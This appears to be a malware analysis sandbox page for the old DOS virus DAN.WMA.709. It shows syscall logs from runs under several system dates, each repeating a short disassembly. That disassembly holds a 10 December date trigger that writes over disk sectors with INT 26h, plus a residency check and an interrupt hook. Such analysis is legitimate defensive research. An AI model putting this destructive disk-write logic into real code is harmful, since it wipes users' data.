Sample viewer

vx.netlux.org/Virus.DOS.DAN.WMA.709

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:09:48.991474971Z 42 PC: 12a52 | Get date
0x12a52: cmp dx, 0xc0a
0x12a56: jne 0x12a66
0x12a58: mov ah, 0xd
0x12a5a: int 0x21
0x12a5c: xor dx, dx
0x12a5e: mov al, 2
0x12a60: mov cx, 0xfffe
0x12a63: int 0x26
0x12a65: pop ax
0x12a66: push ds
0x12a67: push es
0x12a68: dec byte ptr cs:[bp + 0x24]
0x12a6d: push 0xfaca
0x12a70: pop ax
0x12a71: int 0x21
0x12a73: cmp bx, 0xfaca
0x12a77: je 0x12a7f
0x12a79: call 0x12ab3
0x12a7c: call 0x12ae6
0x12a7f: pop es
2018-12-17T22:09:48.994752962Z 250 PC: 12a73 | UNKNOWN!
2018-12-17T22:09:48.995538107Z 74 PC: 12ac8 | Reallocate memory
2018-12-17T22:09:48.996850139Z 72 PC: 12acf | Allocate memory
2018-12-17T22:09:49.008061124Z 53 PC: 12aed | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:09:49.009327621Z 37 PC: 12afc | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:09:49.010459448Z 76 PC: 12d0a | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":2214,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:45:09.226144898Z 42 PC: 12a52 | Get date
0x12a52: cmp dx, 0xc0a
0x12a56: jne 0x12a66
0x12a58: mov ah, 0xd
0x12a5a: int 0x21
0x12a5c: xor dx, dx
0x12a5e: mov al, 2
0x12a60: mov cx, 0xfffe
0x12a63: int 0x26
0x12a65: pop ax
0x12a66: push ds
0x12a67: push es
0x12a68: dec byte ptr cs:[bp + 0x24]
0x12a6d: push 0xfaca
0x12a70: pop ax
0x12a71: int 0x21
0x12a73: cmp bx, 0xfaca
0x12a77: je 0x12a7f
0x12a79: call 0x12ab3
0x12a7c: call 0x12ae6
0x12a7f: pop es
2018-12-25T11:45:09.229226415Z 250 PC: 12a73 | UNKNOWN!
2018-12-25T11:45:09.229986405Z 74 PC: 12ac8 | Reallocate memory
2018-12-25T11:45:09.231477927Z 72 PC: 12acf | Allocate memory
2018-12-25T11:45:09.234303491Z 53 PC: 12aed | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:45:09.236449299Z 37 PC: 12afc | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:45:09.237927436Z 76 PC: 12d0a | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":10,"Month":12,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":2214,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:45:09.462577046Z 42 PC: 12a52 | Get date
0x12a52: cmp dx, 0xc0a
0x12a56: jne 0x12a66
0x12a58: mov ah, 0xd
0x12a5a: int 0x21
0x12a5c: xor dx, dx
0x12a5e: mov al, 2
0x12a60: mov cx, 0xfffe
0x12a63: int 0x26
0x12a65: pop ax
0x12a66: push ds
0x12a67: push es
0x12a68: dec byte ptr cs:[bp + 0x24]
0x12a6d: push 0xfaca
0x12a70: pop ax
0x12a71: int 0x21
0x12a73: cmp bx, 0xfaca
0x12a77: je 0x12a7f
0x12a79: call 0x12ab3
0x12a7c: call 0x12ae6
0x12a7f: pop es
2018-12-25T11:45:09.465164637Z 13 PC: 12a5c | Disk reset
2018-12-25T11:45:09.46812238Z 250 PC: 12a73 | UNKNOWN!
2018-12-25T11:45:09.469137601Z 74 PC: 12ac8 | Reallocate memory
2018-12-25T11:45:09.470774301Z 72 PC: 12acf | Allocate memory
2018-12-25T11:45:09.473091615Z 53 PC: 12aed | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:45:09.474501818Z 37 PC: 12afc | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:45:09.475810997Z 76 PC: 12d0a | Terminate with return code (Return code = '0')